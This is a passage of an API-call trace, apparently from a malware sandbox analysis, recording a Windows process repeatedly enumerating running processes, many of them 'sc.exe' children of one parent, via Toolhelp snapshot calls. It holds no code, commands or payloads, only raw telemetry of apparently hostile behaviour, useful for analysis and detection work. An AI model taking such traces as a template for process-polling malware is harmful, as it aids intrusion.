th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xb14, pcPriClassBase=8, dwFlags=0x0, szExeFile="sc.exe")) returned 1 [0065.459] wcslen (_String="sc.exe") returned 0x6 [0065.459] Process32NextW (in: hSnapshot=0x17c, lppe=0x84b0fdf4e0 | out: lppe=0x84b0fdf4e0*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0xd04, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xb14, pcPriClassBase=8, dwFlags=0x0, szExeFile="sc.exe")) returned 1 [0065.460] wcslen (_String="sc.exe") returned 0x6 [0065.460] Process32NextW (in: hSnapshot=0x17c, lppe=0x84b0fdf4e0 | out: lppe=0x84b0fdf4e0*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0xd0c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xb14, pcPriClassBase=8, dwFlags=0x0, szExeFile="sc.exe")) returned 1 [0065.460] wcslen (_String="sc.exe") returned 0x6 [0065.461] Process32NextW (in: hSnapshot=0x17c, lppe=0x84b0fdf4e0 | out: lppe=0x84b0fdf4e0*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0xd14, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xb14, pcPriClassBase=8, dwFlags=0x0, szExeFile="sc.exe")) returned 1 [0065.461] wcslen (_String="sc.exe") returned 0x6 [0065.461] Process32NextW (in: hSnapshot=0x17c, lppe=0x84b0fdf4e0 | out: lppe=0x84b0fdf4e0*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0xd1c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xb14, pcPriClassBase=8, dwFlags=0x0, szExeFile="sc.exe")) returned 1 [0065.462] wcslen (_String="sc.exe") returned 0x6 [0065.462] Process32NextW (in: hSnapshot=0x17c, lppe=0x84b0fdf4e0 | out: lppe=0x84b0fdf4e0*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0xd24, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xb14, pcPriClassBase=8, dwFlags=0x0, szExeFile="sc.exe")) returned 1 [0065.463] wcslen (_String="sc.exe") returned 0x6 [0065.463] Process32NextW (in: hSnapshot=0x17c, lppe=0x84b0fdf4e0 | out: lppe=0x84b0fdf4e0*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0xd2c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xb14, pcPriClassBase=8, dwFlags=0x0, szExeFile="sc.exe")) returned 1 [0065.464] wcslen (_String="sc.exe") returned 0x6 [0065.464] Process32NextW (in: hSnapshot=0x17c, lppe=0x84b0fdf4e0 | out: lppe=0x84b0fdf4e0*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0xd34, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xb14, pcPriClassBase=8, dwFlags=0x0, szExeFile="sc.exe")) returned 1 [0065.465] wcslen (_String="sc.exe") returned 0x6 [0065.465] Process32NextW (in: hSnapshot=0x17c, lppe=0x84b0fdf4e0 | out: lppe=0x84b0fdf4e0*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0xd3c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xb14, pcPriClassBase=8, dwFlags=0x0, szExeFile="sc.exe")) returned 1 [0065.465] wcslen (_String="sc.exe") returned 0x6 [0065.465] Process32NextW (in: hSnapshot=0x17c, lppe=0x84b0fdf4e0 | out: lppe=0x84b0fdf4e0*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0xd44, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xb14, pcPriClassBase=8, dwFlags=0x0, szExeFile="sc.exe")) returned 1 [0065.473] wcslen (_String="sc.exe") returned 0x6 [0065.473] Process32NextW (in: hSnapshot=0x17c, lppe=0x84b0fdf4e0 | out: lppe=0x84b0fdf4e0*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0xd4c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xb14, pcPriClassBase=8, dwFlags=0x0, szExeFile="sc.exe")) returned 1 [0065.474] wcslen (_String="sc.exe") returned 0x6 [0065.474] Process32NextW (in: hSnapshot=0x17c, lppe=0x84b0fdf4e0 | out: lppe=0x84b0fdf4e0*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0xd54, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xb14, pcPriClassBase=8, dwFlags=0x0, szExeFile="sc.exe")) returned 1 [0065.475] wcslen (_String="sc.exe") returned 0x6 [0065.475] Process32NextW (in: hSnapshot=0x17c, lppe=0x84b0fdf4e0 | out: lppe=0x84b0fdf4e0*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0xd5c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xb14, pcPriClassBase=8, dwFlags=0x0, szExeFile="sc.exe")) returned 1 [0065.475] wcslen (_String="sc.exe") returned 0x6 [0065.475] Process32NextW (in: hSnapshot=0x17c, lppe=0x84b0fdf4e0 | out: lppe=0x84b0fdf4e0*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0xd64, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xb14, pcPriClassBase=8, dwFlags=0x0, szExeFile="sc.exe")) returned 1 [0065.476] wcslen (_String="sc.exe") returned 0x6 [0065.476] Process32NextW (in: hSnapshot=0x17c, lppe=0x84b0fdf4e0 | out: lppe=0x84b0fdf4e0*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0xd6c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xb14, pcPriClassBase=8, dwFlags=0x0, szExeFile="sc.exe")) returned 1 [0065.477] wcslen (_String="sc.exe") returned 0x6 [0065.477] Process32NextW (in: hSnapshot=0x17c, lppe=0x84b0fdf4e0 | out: lppe=0x84b0fdf4e0*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0xd74, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xb14, pcPriClassBase=8, dwFlags=0x0, szExeFile="sc.exe")) returned 1 [0065.477] wcslen (_String="sc.exe") returned 0x6 [0065.477] Process32NextW (in: hSnapshot=0x17c, lppe=0x84b0fdf4e0 | out: lppe=0x84b0fdf4e0*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0xd7c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xb14, pcPriClassBase=8, dwFlags=0x0, szExeFile="sc.exe")) returned 1 [0065.478] wcslen (_String="sc.exe") returned 0x6 [0065.478] Process32NextW (in: hSnapshot=0x17c, lppe=0x84b0fdf4e0 | out: lppe=0x84b0fdf4e0*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0xd84, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xb14, pcPriClassBase=8, dwFlags=0x0, szExeFile="sc.exe")) returned 1 [0065.478] wcslen (_String="sc.exe") returned 0x6 [0065.478] Process32NextW (in: hSnapshot=0x17c, lppe=0x84b0fdf4e0 | out: lppe=0x84b0fdf4e0*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0xd8c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xb14, pcPriClassBase=8, dwFlags=0x0, szExeFile="sc.exe")) returned 1 [0065.703] wcslen (_String="sc.exe") returned 0x6 [0065.703] Process32NextW (in: hSnapshot=0x17c, lppe=0x84b0fdf4e0 | out: lppe=0x84b0fdf4e0*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0xd94, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xb14, pcPriClassBase=8, dwFlags=0x0, szExeFile="sc.exe")) returned 1 [0065.836] CloseHandle (hObject=0x17c) returned 1 [0065.836] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0x198 [0065.846] Process32FirstW (in: hSnapshot=0x198, lppe=0x84b0fdf4e0 | out: lppe=0x84b0fdf4e0*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0066.183] CloseHandle (hObject=0x198) returned 1 [0066.183] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0x17c [0066.277] Process32FirstW (in: hSnapshot=0x17c, lppe=0x84b0fdf4e0 | out: lppe=0x84b0fdf4e0*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0066.768] CloseHandle (hObject=0x17c) returned 1 [0066.768] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0x198 [0066.847] Process32FirstW (in: hSnapshot=0x198, lppe=0x84b0fdf4e0 | out: lppe=0x84b0fdf4e0*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0067.184] CloseHandle (hObject=0x198) returned 1 [0067.184] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0x17c [0067.307] Process32FirstW (in: hSnapshot=0x17c, lppe=0x84b0fdf4e0 | out: lppe=0x84b0fdf4e0*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0067.743] CloseHandle (hObject=0x17c) returned 1 [0067.743] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0x198 [0067.755] Process32FirstW (in: hSnapshot=0x198, lppe=0x84b0fdf4e0 | out: lppe=0x84b0fdf4e0*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0068.039] CloseHandle (hObject=0x198) returned 1 [0068.039] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0x17c [0068.047] Process32FirstW (in: hSnapshot=0x17c, lppe=0x84b0fdf4e0 | out: lppe=0x84b0fdf4e0*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0068.360] CloseHandle (hObject=0x17c) returned 1 [0068.360] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0x198 [0068.416] Process32FirstW (in: hSnapshot=0x198, lppe=0x84b0fdf4e0 | out: lppe=0x84b0fdf4e0*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0068.740] CloseHandle (hObject=0x198) returned 1 [0068.740] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0x17c [0068.840] Process32FirstW (in: hSnapshot=0x17c, lppe=0x84b0fdf4e0 | out: lppe=0x84b0fdf4e0*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0069.058] CloseHandle (hObject=0x17c) returned 1 [0069.058] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0x198 [0069.065] Process32FirstW (in: hSnapshot=0x198, lppe=0x84b0fdf4e0 | out: lppe=0x84b0fdf4e0*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0069.276] CloseHandle (hObject=0x198) returned 1 [0069.276] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0x17c [0069.285] Process32FirstW (in: hSnapshot=0x17c, lppe=0x84b0fdf4e0 | out: lppe=0x84b0fdf4e0*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0069.509] CloseHandle (hObject=0x17c) returned 1 [0069.510] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0x198 [0069.595] Process32FirstW (in: hSnapshot=0x198, lppe=0x84b0fdf4e0 | out: lppe=0x84b0fdf4e0*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0069.965] CloseHandle (hObject=0x198) returned 1 [0069.965] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0x17c [0069.974] Process32FirstW (in: hSnapshot=0x17c, lppe=0x84b0fdf4e0 | out: lppe=0x84b0fdf4e0*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0070.203] CloseHandle (hObject=0x17c) returned 1 [0070.203] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0x198 [0070.212] Process32FirstW (in: hSnapshot=0x198, lppe=0x84b0fdf4e0 | out: lppe=0x84b0fdf4e0*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0070.557] CloseHandle (hObject=0x198) returned 1 [0070.557] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0x17c [0070.568] Process32FirstW (in: hSnapshot=0x17c, lppe=0x84b0fdf4e0 | out: lppe=0x84b0fdf4e0*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0070.907] CloseHandle (hObject=0x17c) returned 1 [0070.907] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0x198 [0070.996] Process32FirstW (in: hSnapshot=0x198, lppe=0x84b0fdf4e0 | out: lppe=0x84b0fdf4e0*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0071.231] CloseHandle (hObject=0x198) returned 1 [0071.231] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0x17c [0071.241] Process32FirstW (in: hSnapshot=0x17c, lppe=0x84b0fdf4e0 | out: lppe=0x84b0fdf4e0*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0071.500] CloseHandle (hObject=0x17c) returned 1 [0071.500] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0x198 [0071.509] Process32FirstW (in: hSnapshot=0x198, lppe=0x84b0fdf4e0 | out: lppe=0x84b0fdf4e0*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0071.818] CloseHandle (hObject=0x198) returned 1 [0071.818] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0x17c [0071.826] Process32FirstW (in: hSnapshot=0x17c, lppe=0x84b0fdf4e0 | out: lppe=0x84b0fdf4e0*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0072.204] CloseHandle (hObject=0x17c) returned 1 [0072.204] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0x198 [0072.214] Process32FirstW (in: hSnapshot=0x198, lppe=0x84b0fdf4e0 | out: lppe=0x84b0fdf4e0*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0072.440] CloseHandle (hObject=0x198) returned 1 [0072.440] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0x17c [0072.447] Process32FirstW (in: hSnapshot=0x17c, lppe=0x84b0fdf4e0 | out: lppe=0x84b0fdf4e0*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0072.608] CloseHandle (hObject=0x17c) returned 1 [0072.608] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0x198 [0072.616] Process32FirstW (in: hSnapshot=0x198, lppe=0x84b0fdf4e0 | out: lppe=0x84b0fdf4e0*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0072.871] CloseHandle (hObject=0x198) returned 1 [0072.871] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0x17c [0072.882] Process32FirstW (in: hSnapshot=0x17c, lppe=0x84b0fdf4e0 | out: lppe=0x84b0fdf4e0*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0072.972] CloseHandle (hObject=0x17c) returned 1 [0072.972] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0x198 [0072.979] Process32FirstW (in: hSnapshot=0x198, lppe=0x84b0fdf4e0 | out: lppe=0x84b0fdf4e0*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0073.137] CloseHandle (hObject=0x198) returned 1 [0073.137] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0x17c [0073.165] Process32FirstW (in: hSnapshot=0x17c, lppe=0x84b0fdf4e0 | out: lppe=0x84b0fdf4e0*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0073.247] CloseHandle (hObject=0x17c) returned 1 [0073.247] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0x198 [0073.259] Process32FirstW (in: hSnapshot=0x198, lppe=0x84b0fdf4e0 | out: lppe=0x84b0fdf4e0*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0073.389] CloseHandle (hObject=0x198) returned 1 [0073.389] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0x17c [0073.397] Process32FirstW (in: hSnapshot=0x17c, lppe=0x84b0fdf4e0 | out: lppe=0x84b0fdf4e0*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0073.481] CloseHandle (hObject=0x17c) returned 1 [0073.481] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0x198 [0073.490] Process32FirstW (in: hSnapshot=0x198, lppe=0x84b0fdf4e0 | out: lppe=0x84b0fdf4e0*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0073.600] CloseHandle (hObject=0x198) returned 1 [0073.600] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0x17c [0073.608] Process32FirstW (in: hSnapshot=0x17c, lppe=0x84b0fdf4e0 | out: lppe=0x84b0fdf4e0*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0073.797] CloseHandle (hObject=0x17c) returned 1 [0073.797] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0x198 [0073.805] Process32FirstW (in: hSnapshot=0x198, lppe=0x84b0fdf4e0 | out: lppe=0x84b0fdf4e0*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0073.916] CloseHandle (hObject=0x198) returned 1 [0073.916] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0x17c [0073.924] Process32FirstW (in: hSnapshot=0x17c, lppe=0x84b0fdf4e0 | out: lppe=0x84b0fdf4e0*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0074.028] CloseHandle (hObject=0x17c) returned 1 [0074.028] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0x198 [0074.050] Process32FirstW (in: hSnapshot=0x198, lppe=0x84b0fdf4e0 | out: lppe=0x84b0fdf4e0*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0074.139] CloseHandle (hObject=0x198) returned 1 [0074.139] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0x17c [0074.146] Process32FirstW (in: hSnapshot=0x17c, lppe=0x84b0fdf4e0 | out: lppe=0x84b0fdf4e0*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0074.304] CloseHandle (hObject=0x17c) returned 1 [0074.304] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0x198 [0074.321] Process32FirstW (in: hSnapshot=0x198, lppe=0x84b0fdf4e0 | out: lppe=0x84b0fdf4e0*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0074.468] CloseHandle (hObject=0x198) returned 1 [0074.468] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0x17c [0074.476] Process32FirstW (in: hSnapshot=0x17c, lppe=0x84b0fdf4e0 | out: lppe=0x84b0fdf4e0*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0074.739] CloseHandle (hObject=0x17c) returned 1 [0074.739] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0x198 [0074.747] Process32FirstW (in: hSnapshot=0x198, lppe=0x84b0fdf4e0 | out: lppe=0x84b0fdf4e0*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0074.917] CloseHandle (hObject=0x198) returned 1 [0074.917] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0x17c [0074.927] Process32FirstW (in: hSnapshot=0x17c, lppe=0x84b0fdf4e0 | out: lppe=0x84b0fdf4e0*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0075.123] CloseHandle (hObject=0x17c) returned 1 [0075.123] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0x198 [0075.133] Process32FirstW (in: hSnapshot=0x198, lppe=0x84b0fdf4e0 | out: lppe=0x84b0fdf4e0*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0075.228] CloseHandle (hObject=0x198) returned 1 [0075.228] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0x17c [0075.245] Process32FirstW (in: hSnapshot=0x17c, lppe=0x84b0fdf4e0 | out: lppe=0x84b0fdf4e0*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0075.412] CloseHandle (hObject=0x17c) returned 1 [0075.413] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0x198 [0075.422] Process32FirstW (in: hSnapshot=0x198, lppe=0x84b0fdf4e0 | out: lppe=0x84b0fdf4e0*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0075.498] CloseHandle (hObject=0x198) returned 1 [0075.498] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0x17c [0075.507] Process32FirstW (in: hSnapshot=0x17c, lppe=0x84b0fdf4e0 | out: lppe=0x84b0fdf4e0*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0075.706] CloseHandle (hObject=0x17c) returned 1 [0075.706] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0x198 [0075.716] Process32FirstW (in: hSnapshot=0x198, lppe=0x84b0fdf4e0 | out: lppe=0x84b0fdf4e0*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0075.819] CloseHandle (hObject=0x198) returned 1 [0075.819] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0x17c [0075.827] Process32FirstW (in: hSnapshot=0x17c, lppe=0x84b0fdf4e0 | out: lppe=0x84b0fdf4e0*(dwSize=0x238, 